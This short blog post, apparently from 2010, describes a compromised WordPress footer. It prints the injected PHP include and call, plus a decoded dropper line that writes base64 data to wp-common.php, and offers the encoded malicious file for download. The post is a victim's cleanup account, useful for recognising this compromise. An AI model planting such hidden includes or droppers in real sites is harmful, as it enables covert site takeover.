Proxyutza blogAbout all sorth of things: PHP, Hacks, Scripts, Servers, Linux, Technology, News, Trends

WordPress hacked with Zend encoded script

This time happened on Hostgator, I found the following code in my footer.php file:

1
2

<?php @include_once(ABSPATH . "/wp-includes/wp-vars.php"); ?>
<?=@get_wp_results('f');?>

This totally screwed my footer section and above that it made my website traffic go to zero. I immediately removed the code and discovered two files:
wp-includes/wp-vars.php encoded with Zend which I am unable to decode. It would be great if someone could decode this so we can see the malicious code.
wp-includes/wp-version.php encoded with base_64 and decoded to :
file_put_contents(‘wp-common.php’,base64_decode($bb) )

I deleted both of these files and everything seems ok now. I was unable to find wp-common.php so I assume it wasn’t created yet.
wp-includes/wp-vars.php encoded with Zendwp-includes/wp-version.php

Downloads:
wp-vars

Wednesday, May 26th, 2010 at 12:29 pm and is filed under PHP, Wordpress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.